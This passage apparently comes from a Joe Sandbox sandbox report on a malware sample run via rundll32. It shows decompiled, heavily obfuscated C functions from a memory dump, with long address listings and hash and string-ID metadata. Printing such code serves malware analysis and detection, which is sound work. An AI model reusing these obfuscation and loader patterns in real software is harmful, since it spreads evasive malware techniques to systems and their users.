				_v4 = _v4 * 0x61;
				_v4 = _v4 ^ 0x438b1823;
				_v8 = 0x4d4bc7;
				_v8 = _v8 + 0xffff7d22;
				_v8 = _v8 ^ 0x00436970;
				_v12 = 0xfbac3c;
				_v12 = _v12 | 0x3e605f41;
				_v12 = _v12 << 4;
				_v12 = _v12 ^ 0xefb5eaa0;
				do {
					while(_t120 != 0x25318c3) {
						if(_t120 == 0x409e50d) {
							_t103 = E00821B4F();
							_t122 = _t122 - 0xc + 0xc;
							_t120 = 0x7f367f8;
							_t119 = _t119 + _t103;
							continue;
						} else {
							if(_t120 == 0x7f367f8) {
								_t104 = E0081AB82(_t107 + 0xc, _v24, _v40, _v28);
								_t122 =  &(_t122[2]);
								_t120 = 0xdeee07a;
								_t119 = _t119 + _t104;
								continue;
							} else {
								if(_t120 != 0xdeee07a) {
									goto L10;
								} else {
									_t119 = _t119 + E0081AB82(_t107 + 4, _v4, _v8, _v12);
								}
							}
						}
						L6:
						return _t119;
					}
					_t120 = 0x409e50d;
					L10:
				} while (_t120 != 0xb6d7b22);
				goto L6;
			}





















                                                                                                                      0x0082482e
                                                                                                                      0x00824831
                                                                                                                      0x0082483b
                                                                                                                      0x0082484d
                                                                                                                      0x0082484f
                                                                                                                      0x00824851
                                                                                                                      0x00824856
                                                                                                                      0x0082485c
                                                                                                                      0x00824864
                                                                                                                      0x00824869
                                                                                                                      0x00824876
                                                                                                                      0x0082487e
                                                                                                                      0x00824887
                                                                                                                      0x0082488a
                                                                                                                      0x0082488e
                                                                                                                      0x00824896
                                                                                                                      0x0082489e
                                                                                                                      0x008248a3
                                                                                                                      0x008248ab
                                                                                                                      0x008248b3
                                                                                                                      0x008248bb
                                                                                                                      0x008248c8
                                                                                                                      0x008248cc
                                                                                                                      0x008248d1
                                                                                                                      0x008248d9
                                                                                                                      0x008248e1
                                                                                                                      0x008248e9
                                                                                                                      0x008248f1
                                                                                                                      0x008248f9
                                                                                                                      0x00824901
                                                                                                                      0x00824906
                                                                                                                      0x0082490e
                                                                                                                      0x00824916
                                                                                                                      0x0082491e
                                                                                                                      0x00824926
                                                                                                                      0x0082492b
                                                                                                                      0x00824933
                                                                                                                      0x0082493b
                                                                                                                      0x00824948
                                                                                                                      0x0082494c
                                                                                                                      0x00824954
                                                                                                                      0x0082495c
                                                                                                                      0x00824964
                                                                                                                      0x0082496c
                                                                                                                      0x00824974
                                                                                                                      0x0082497c
                                                                                                                      0x00824981
                                                                                                                      0x00824989
                                                                                                                      0x00824989
                                                                                                                      0x00824993
                                                                                                                      0x008249fb
                                                                                                                      0x00824a00
                                                                                                                      0x00824a03
                                                                                                                      0x00824a08
                                                                                                                      0x00000000
                                                                                                                      0x00824995
                                                                                                                      0x0082499b
                                                                                                                      0x008249d7
                                                                                                                      0x008249dc
                                                                                                                      0x008249df
                                                                                                                      0x008249e4
                                                                                                                      0x00000000
                                                                                                                      0x0082499d
                                                                                                                      0x008249a3
                                                                                                                      0x00000000
                                                                                                                      0x008249a5
                                                                                                                      0x008249bc
                                                                                                                      0x008249bc
                                                                                                                      0x008249a3
                                                                                                                      0x0082499b
                                                                                                                      0x008249be
                                                                                                                      0x008249c7
                                                                                                                      0x008249c7
                                                                                                                      0x00824a0f
                                                                                                                      0x00824a11
                                                                                                                      0x00824a11
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$A_`>$piC$z$z
                                                                                                                      • API String ID: 0-2268621895
                                                                                                                      • Opcode ID: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction ID: 1709b7669d33f6d5e1906dc19183f783034b807282e4049ef461da73e9bb1039
                                                                                                                      • Opcode Fuzzy Hash: c925c1865817eedd0fadeedc6ca736b8d814e838a0fef344f25dca19e791c3cd
                                                                                                                      • Instruction Fuzzy Hash: 89413BB29093019FC344CF25D58944BFBE1FBD4758F019A2DF499A6220D774CA498F97
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0082C089 Relevance: 5.3, Strings: 4, Instructions: 287COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082C089(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* __ecx;
				void* _t283;
				void* _t316;
				intOrPtr _t320;
				void* _t325;
				intOrPtr* _t328;
				void* _t330;
				void* _t365;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int* _t381;

				_t367 = _a4;
				_t328 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0081C325(_t283);
				_v60 = 0x688185;
				_t381 =  &(( &_v116)[4]);
				_v60 = _v60 ^ 0x6a5ee641;
				_t6 =  &_v60; // 0x6a5ee641
				_t365 = 0;
				_t330 = 0xb7d839b;
				_t368 = 0x77;
				_v60 =  *_t6 * 0x53;
				_v60 = _v60 ^ 0x6fa3a48d;
				_v36 = 0x2ce9a9;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x0000609f;
				_v72 = 0x8d05d4;
				_v72 = _v72 + 0xfffff9ae;
				_v72 = _v72 + 0xfffffb99;
				_v72 = _v72 + 0xffff1821;
				_v72 = _v72 ^ 0x008c133c;
				_v84 = 0xdf93a7;
				_v84 = _v84 + 0x158a;
				_v84 = _v84 | 0xa6edaf65;
				_v84 = _v84 ^ 0xa6ffaf75;
				_v16 = 0x181fb2;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x00000303;
				_v40 = 0xf7fe46;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0x000f7fe4;
				_v96 = 0x7307ab;
				_v96 = _v96 + 0xffff98a0;
				_v96 = _v96 ^ 0x207b23a6;
				_t369 = 7;
				_v96 = _v96 / _t369;
				_v96 = _v96 ^ 0x0493a521;
				_v68 = 0xb0f7c2;
				_v68 = _v68 + 0xa001;
				_v68 = _v68 + 0xf927;
				_t370 = 0x1b;
				_v68 = _v68 / _t370;
				_v68 = _v68 ^ 0x0001298b;
				_v20 = 0x9a8fe8;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0008eae3;
				_v76 = 0xc447f;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x6da7c905;
				_v76 = _v76 | 0x8e440162;
				_v76 = _v76 ^ 0xefde5c32;
				_v80 = 0xe5293a;
				_v80 = _v80 ^ 0x7ea2fbd4;
				_v80 = _v80 << 6;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000bb464;
				_v24 = 0xaea513;
				_v24 = _v24 ^ 0xb7e1a43c;
				_v24 = _v24 ^ 0xb74b462d;
				_v28 = 0x6b2191;
				_v28 = _v28 | 0x9c0eb3e2;
				_v28 = _v28 ^ 0x9c639c10;
				_v32 = 0x4e8823;
				_t371 = 0xe;
				_v32 = _v32 / _t371;
				_v32 = _v32 ^ 0x000823cf;
				_v88 = 0x8b37c7;
				_v88 = _v88 + 0x96e4;
				_t372 = 0x63;
				_v88 = _v88 / _t372;
				_t373 = 0x18;
				_v88 = _v88 / _t373;
				_v88 = _v88 ^ 0x000cd8d0;
				_v92 = 0x8ccaf;
				_v92 = _v92 + 0xffff7c77;
				_v92 = _v92 >> 7;
				_t374 = 0x1a;
				_v92 = _v92 * 0x4a;
				_v92 = _v92 ^ 0x000ee576;
				_v100 = 0x6d8220;
				_v100 = _v100 + 0xffffba59;
				_v100 = _v100 / _t374;
				_v100 = _v100 + 0x20d5;
				_v100 = _v100 ^ 0x000e9a10;
				_v104 = 0xccaba6;
				_t375 = 0x29;
				_v104 = _v104 / _t375;
				_t376 = 0x69;
				_v104 = _v104 / _t376;
				_v104 = _v104 + 0xffff1a57;
				_v104 = _v104 ^ 0xfff2229f;
				_v44 = 0x73a08b;
				_v44 = _v44 / _t376;
				_v44 = _v44 ^ 0x0004e5c5;
				_v108 = 0xb1e3bd;
				_v108 = _v108 ^ 0x0f8130c9;
				_v108 = _v108 + 0x5ac4;
				_t377 = 0x21;
				_v108 = _v108 / _t377;
				_v108 = _v108 ^ 0x0077ef5a;
				_v112 = 0x4cec76;
				_t192 =  &_v112; // 0x4cec76
				_v112 =  *_t192 * 0x1a;
				_v112 = _v112 + 0xdd93;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xf432eb29;
				_v116 = 0x879801;
				_v116 = _v116 + 0x9229;
				_v116 = _v116 << 3;
				_v116 = _v116 | 0xee96daec;
				_v116 = _v116 ^ 0xeed13984;
				_v64 = 0x9b79ce;
				_v64 = _v64 >> 0xe;
				_t378 = 0x5f;
				_v64 = _v64 * 0x1e;
				_v64 = _v64 | 0xf7dc9e8a;
				_v64 = _v64 ^ 0xf7d2a70d;
				_v48 = 0x898fb;
				_v48 = _v48 << 0xa;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 ^ 0x9cd9bf24;
				_v52 = 0xd43737;
				_v52 = _v52 << 9;
				_v52 = _v52 / _t378;
				_v52 = _v52 ^ 0x01c68cd1;
				_v56 = 0x1c405f;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 | 0xb1ef7bec;
				_v56 = _v56 ^ 0xb1edddf2;
				do {
					while(_t330 != 0x6ea4fc1) {
						if(_t330 == 0x7f0f713) {
							_push(_t330);
							_push(_t330);
							_t320 = E00822912(_v8);
							_v12 = _t320;
							if(_t320 != 0) {
								_t330 = 0xa80f622;
								continue;
							}
						} else {
							if(_t330 == 0x7f61550) {
								E00815CDE(_v64, _v48, _v52, _v56, _v12);
							} else {
								if(_t330 == 0xa80f622) {
									_t253 =  *0x10025c9c + 0x50; // 0x8b08458b
									_t325 = E0081A735(_v100,  *_t367, _v104,  *_t253, _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
									_t381 =  &(_t381[0xe]);
									if(_t325 == _v96) {
										 *_t328 = _v12;
										_t365 = 1;
										 *((intOrPtr*)(_t328 + 4)) = _v8;
									} else {
										_t330 = 0x7f61550;
										continue;
									}
								} else {
									if(_t330 != 0xb7d839b) {
										goto L14;
									} else {
										_t330 = 0x6ea4fc1;
										continue;
									}
								}
							}
						}
						L18:
						return _t365;
					}
					_t271 =  *0x10025c9c + 0x50; // 0x8b08458b
					_t316 = E0081A735(_v68,  *_t367, _v20,  *_t271, _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
					_t381 =  &(_t381[0xe]);
					if(_t316 != _v16) {
						_t330 = 0x33d9eeb;
						goto L14;
					} else {
						_t330 = 0x7f0f713;
						continue;
					}
					goto L18;
					L14:
				} while (_t330 != 0x33d9eeb);
				goto L18;
			}



















































                                                                                                                      0x0082c08f
                                                                                                                      0x0082c096
                                                                                                                      0x0082c099
                                                                                                                      0x0082c0a0
                                                                                                                      0x0082c0a1
                                                                                                                      0x0082c0a3
                                                                                                                      0x0082c0a8
                                                                                                                      0x0082c0b0
                                                                                                                      0x0082c0b3
                                                                                                                      0x0082c0bd
                                                                                                                      0x0082c0c2
                                                                                                                      0x0082c0c4
                                                                                                                      0x0082c0cb
                                                                                                                      0x0082c0ce
                                                                                                                      0x0082c0d2
                                                                                                                      0x0082c0da
                                                                                                                      0x0082c0ea
                                                                                                                      0x0082c0ee
                                                                                                                      0x0082c0f6
                                                                                                                      0x0082c0fe
                                                                                                                      0x0082c106
                                                                                                                      0x0082c10e
                                                                                                                      0x0082c116
                                                                                                                      0x0082c11e
                                                                                                                      0x0082c126
                                                                                                                      0x0082c12e
                                                                                                                      0x0082c136
                                                                                                                      0x0082c13e
                                                                                                                      0x0082c146
                                                                                                                      0x0082c14b
                                                                                                                      0x0082c153
                                                                                                                      0x0082c15b
                                                                                                                      0x0082c160
                                                                                                                      0x0082c168
                                                                                                                      0x0082c170
                                                                                                                      0x0082c178
                                                                                                                      0x0082c184
                                                                                                                      0x0082c189
                                                                                                                      0x0082c18f
                                                                                                                      0x0082c197
                                                                                                                      0x0082c19f
                                                                                                                      0x0082c1a7
                                                                                                                      0x0082c1b3
                                                                                                                      0x0082c1b6
                                                                                                                      0x0082c1ba
                                                                                                                      0x0082c1c2
                                                                                                                      0x0082c1ca
                                                                                                                      0x0082c1cf
                                                                                                                      0x0082c1d7
                                                                                                                      0x0082c1df
                                                                                                                      0x0082c1e4
                                                                                                                      0x0082c1ec
                                                                                                                      0x0082c1f4
                                                                                                                      0x0082c1fc
                                                                                                                      0x0082c204
                                                                                                                      0x0082c20c
                                                                                                                      0x0082c211
                                                                                                                      0x0082c216
                                                                                                                      0x0082c21e
                                                                                                                      0x0082c226
                                                                                                                      0x0082c22e
                                                                                                                      0x0082c236
                                                                                                                      0x0082c23e
                                                                                                                      0x0082c246
                                                                                                                      0x0082c24e
                                                                                                                      0x0082c25e
                                                                                                                      0x0082c263
                                                                                                                      0x0082c267
                                                                                                                      0x0082c26f
                                                                                                                      0x0082c277
                                                                                                                      0x0082c285
                                                                                                                      0x0082c28a
                                                                                                                      0x0082c294
                                                                                                                      0x0082c299
                                                                                                                      0x0082c29d
                                                                                                                      0x0082c2a5
                                                                                                                      0x0082c2ad
                                                                                                                      0x0082c2b5
                                                                                                                      0x0082c2c1
                                                                                                                      0x0082c2c4
                                                                                                                      0x0082c2c8
                                                                                                                      0x0082c2d0
                                                                                                                      0x0082c2d8
                                                                                                                      0x0082c2e8
                                                                                                                      0x0082c2ec
                                                                                                                      0x0082c2f4
                                                                                                                      0x0082c2fc
                                                                                                                      0x0082c308
                                                                                                                      0x0082c30d
                                                                                                                      0x0082c317
                                                                                                                      0x0082c31c
                                                                                                                      0x0082c320
                                                                                                                      0x0082c328
                                                                                                                      0x0082c330
                                                                                                                      0x0082c340
                                                                                                                      0x0082c346
                                                                                                                      0x0082c34e
                                                                                                                      0x0082c356
                                                                                                                      0x0082c35e
                                                                                                                      0x0082c36a
                                                                                                                      0x0082c36d
                                                                                                                      0x0082c371
                                                                                                                      0x0082c379
                                                                                                                      0x0082c381
                                                                                                                      0x0082c386
                                                                                                                      0x0082c38a
                                                                                                                      0x0082c392
                                                                                                                      0x0082c397
                                                                                                                      0x0082c39f
                                                                                                                      0x0082c3a7
                                                                                                                      0x0082c3af
                                                                                                                      0x0082c3b4
                                                                                                                      0x0082c3bc
                                                                                                                      0x0082c3c4
                                                                                                                      0x0082c3ce
                                                                                                                      0x0082c3da
                                                                                                                      0x0082c3db
                                                                                                                      0x0082c3df
                                                                                                                      0x0082c3e7
                                                                                                                      0x0082c3ef
                                                                                                                      0x0082c3f7
                                                                                                                      0x0082c401
                                                                                                                      0x0082c405
                                                                                                                      0x0082c40d
                                                                                                                      0x0082c415
                                                                                                                      0x0082c425
                                                                                                                      0x0082c429
                                                                                                                      0x0082c431
                                                                                                                      0x0082c439
                                                                                                                      0x0082c43e
                                                                                                                      0x0082c446
                                                                                                                      0x0082c44e
                                                                                                                      0x0082c44e
                                                                                                                      0x0082c45c
                                                                                                                      0x0082c4f6
                                                                                                                      0x0082c4f7
                                                                                                                      0x0082c4ff
                                                                                                                      0x0082c504
                                                                                                                      0x0082c50f
                                                                                                                      0x0082c515
                                                                                                                      0x00000000
                                                                                                                      0x0082c515
                                                                                                                      0x0082c462
                                                                                                                      0x0082c468
                                                                                                                      0x0082c5af
                                                                                                                      0x0082c46e
                                                                                                                      0x0082c474
                                                                                                                      0x0082c4c1
                                                                                                                      0x0082c4ce
                                                                                                                      0x0082c4d3
                                                                                                                      0x0082c4da
                                                                                                                      0x0082c58f
                                                                                                                      0x0082c591
                                                                                                                      0x0082c596
                                                                                                                      0x0082c4e0
                                                                                                                      0x0082c4e0
                                                                                                                      0x00000000
                                                                                                                      0x0082c4e0
                                                                                                                      0x0082c476
                                                                                                                      0x0082c47c
                                                                                                                      0x00000000
                                                                                                                      0x0082c482
                                                                                                                      0x0082c482
                                                                                                                      0x00000000
                                                                                                                      0x0082c482
                                                                                                                      0x0082c47c
                                                                                                                      0x0082c474
                                                                                                                      0x0082c468
                                                                                                                      0x0082c5b7
                                                                                                                      0x0082c5c0
                                                                                                                      0x0082c5c0
                                                                                                                      0x0082c54e
                                                                                                                      0x0082c55e
                                                                                                                      0x0082c563
                                                                                                                      0x0082c56a
                                                                                                                      0x0082c576
                                                                                                                      0x00000000
                                                                                                                      0x0082c56c
                                                                                                                      0x0082c56c
                                                                                                                      0x00000000
                                                                                                                      0x0082c56c
                                                                                                                      0x00000000
                                                                                                                      0x0082c57b
                                                                                                                      0x0082c57b
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: :)$A^j$Zw$vL
                                                                                                                      • API String ID: 0-3297297485
                                                                                                                      • Opcode ID: c64f724e3b14af37d14ba421015a8f9ebe62776fa4678a0838c69d0e799ec206
                                                                                                                      • Instruction ID: a42bab540e8670e95cc6b347a111217de9aa778b856910534bc9c061029211e8
                                                                                                                      • Opcode Fuzzy Hash: c64f724e3b14af37d14ba421015a8f9ebe62776fa4678a0838c69d0e799ec206
                                                                                                                      • Instruction Fuzzy Hash: C6D11EB15083819FD764CF66D94992BFBE1FBC4748F10891DF29586260D7B29989CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0081BC50 Relevance: 5.1, Strings: 4, Instructions: 125COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0081BC50(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				char _v328;
				char _t126;
				void* _t128;
				signed int _t129;
				void* _t133;
				signed int _t135;
				signed int _t136;
				char* _t137;
				intOrPtr* _t154;

				_v64 = _v64 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v68 = 0xeb7817;
				_v44 = 0x4dbb17;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x000af917;
				_v12 = 0xca90c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 | 0x67e1d035;
				_v12 = _v12 ^ 0x67ebacbe;
				_v32 = 0xdd0ad5;
				_v32 = _v32 >> 6;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x00040440;
				_v16 = 0xaefc2a;
				_v16 = _v16 ^ 0x05a88ae0;
				_t154 = __ecx;
				_t135 = 0x4a;
				_v16 = _v16 / _t135;
				_v16 = _v16 | 0x6472a2d9;
				_v16 = _v16 ^ 0x647c73c3;
				_v8 = 0x7aea22;
				_t41 =  &_v8; // 0x7aea22
				_t136 = 0x5f;
				_v8 =  *_t41 * 0x1d;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x0003680c;
				_v28 = 0xd7a14b;
				_v28 = _v28 >> 1;
				_v28 = _v28 | 0x0e275eed;
				_v28 = _v28 ^ 0x0e6be1b9;
				_v56 = 0x693eb0;
				_t137 =  &_v328;
				_v56 = _v56 / _t136;
				_v56 = _v56 ^ 0x00052716;
				_v52 = 0x6599ea;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x659cef3f;
				_v36 = 0xaf3092;
				_v36 = _v36 + 0xffffd3bf;
				_v36 = _v36 ^ 0x419856f6;
				_v36 = _v36 ^ 0x413f6f4c;
				_v40 = 0x56314e;
				_v40 = _v40 ^ 0x0d0339a4;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x0068e9be;
				_v20 = 0xd689b7;
				_v20 = _v20 >> 1;
				_v20 = _v20 + 0x3668;
				_v20 = _v20 ^ 0x006dcd8c;
				_v24 = 0x36edf6;
				_v24 = _v24 + 0x231d;
				_v24 = _v24 ^ 0xb40b6ffd;
				_v24 = _v24 ^ 0xb434c03a;
				_v48 = 0x867594;
				_v48 = _v48 * 0x3a;
				_v48 = _v48 ^ 0x1e7cd6f5;
				while(1) {
					_t126 =  *_t154;
					if(_t126 == 0) {
						break;
					}
					if(_t126 == 0x2e) {
						 *_t137 = 0;
					} else {
						 *_t137 = _t126;
						_t137 = _t137 + 1;
						_t154 = _t154 + 1;
						continue;
					}
					L6:
					_t128 = E00824DB7(_v44, _v12,  &_v328, _v32);
					_t155 = _t128;
					if(_t128 != 0) {
						L8:
						_t129 = E0082F25E(_v56, _t154 + 1, _v52, _v36);
						_push(_v48);
						_push(_v24);
						_push(_v20);
						_push(_v40);
						return E0081E6C1(_t155, _t129 ^ 0x3e95e426);
					}
					_t133 = E0082ED49(_v16, _v8,  &_v328, _v28);
					_t155 = _t133;
					if(_t133 != 0) {
						goto L8;
					}
					return _t133;
				}
				goto L6;
			}




























                                                                                                                      0x0081bc59
                                                                                                                      0x0081bc5f
                                                                                                                      0x0081bc63
                                                                                                                      0x0081bc6a
                                                                                                                      0x0081bc71
                                                                                                                      0x0081bc75
                                                                                                                      0x0081bc7c
                                                                                                                      0x0081bc83
                                                                                                                      0x0081bc87
                                                                                                                      0x0081bc8b
                                                                                                                      0x0081bc92
                                                                                                                      0x0081bc99
                                                                                                                      0x0081bca0
                                                                                                                      0x0081bca4
                                                                                                                      0x0081bca8
                                                                                                                      0x0081bcaf
                                                                                                                      0x0081bcb6
                                                                                                                      0x0081bcc4
                                                                                                                      0x0081bcc6
                                                                                                                      0x0081bccb
                                                                                                                      0x0081bcd0
                                                                                                                      0x0081bcd7
                                                                                                                      0x0081bcde
                                                                                                                      0x0081bce5
                                                                                                                      0x0081bce9
                                                                                                                      0x0081bcea
                                                                                                                      0x0081bced
                                                                                                                      0x0081bcf1
                                                                                                                      0x0081bcf5
                                                                                                                      0x0081bcfc
                                                                                                                      0x0081bd03
                                                                                                                      0x0081bd06
                                                                                                                      0x0081bd0d
                                                                                                                      0x0081bd14
                                                                                                                      0x0081bd20
                                                                                                                      0x0081bd26
                                                                                                                      0x0081bd29
                                                                                                                      0x0081bd30
                                                                                                                      0x0081bd37
                                                                                                                      0x0081bd3b
                                                                                                                      0x0081bd42
                                                                                                                      0x0081bd49
                                                                                                                      0x0081bd50
                                                                                                                      0x0081bd57
                                                                                                                      0x0081bd5e
                                                                                                                      0x0081bd65
                                                                                                                      0x0081bd6c
                                                                                                                      0x0081bd70
                                                                                                                      0x0081bd77
                                                                                                                      0x0081bd7e
                                                                                                                      0x0081bd81
                                                                                                                      0x0081bd88
                                                                                                                      0x0081bd8f
                                                                                                                      0x0081bd96
                                                                                                                      0x0081bd9d
                                                                                                                      0x0081bda4
                                                                                                                      0x0081bdab
                                                                                                                      0x0081bdb6
                                                                                                                      0x0081bdb9
                                                                                                                      0x0081bdca
                                                                                                                      0x0081bdca
                                                                                                                      0x0081bdce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0081bdc4
                                                                                                                      0x0081bdd2
                                                                                                                      0x0081bdc6
                                                                                                                      0x0081bdc6
                                                                                                                      0x0081bdc8
                                                                                                                      0x0081bdc9
                                                                                                                      0x00000000
                                                                                                                      0x0081bdc9
                                                                                                                      0x0081bdd5
                                                                                                                      0x0081bde5
                                                                                                                      0x0081bdea
                                                                                                                      0x0081bdf0
                                                                                                                      0x0081be0f
                                                                                                                      0x0081be1b
                                                                                                                      0x0081be20
                                                                                                                      0x0081be2a
                                                                                                                      0x0081be2f
                                                                                                                      0x0081be32
                                                                                                                      0x00000000
                                                                                                                      0x0081be3a
                                                                                                                      0x0081be02
                                                                                                                      0x0081be07
                                                                                                                      0x0081be0d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0081be42
                                                                                                                      0x0081be42
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: "z$Lo?A$N1V$h6
                                                                                                                      • API String ID: 0-3272725346
                                                                                                                      • Opcode ID: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction ID: d54d20838cad1112896cb776699569119906aa13f7bb73c30245afb4cb886ee1
                                                                                                                      • Opcode Fuzzy Hash: 4560ea773100d6c33708da93f2f605071fff66f43b738e700dd77952ab7016f5
                                                                                                                      • Instruction Fuzzy Hash: 79513F32C0121EEBCF09CFA4D94A6EEBBB1FF54308F208199D511B6260D7B50A49CFA5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%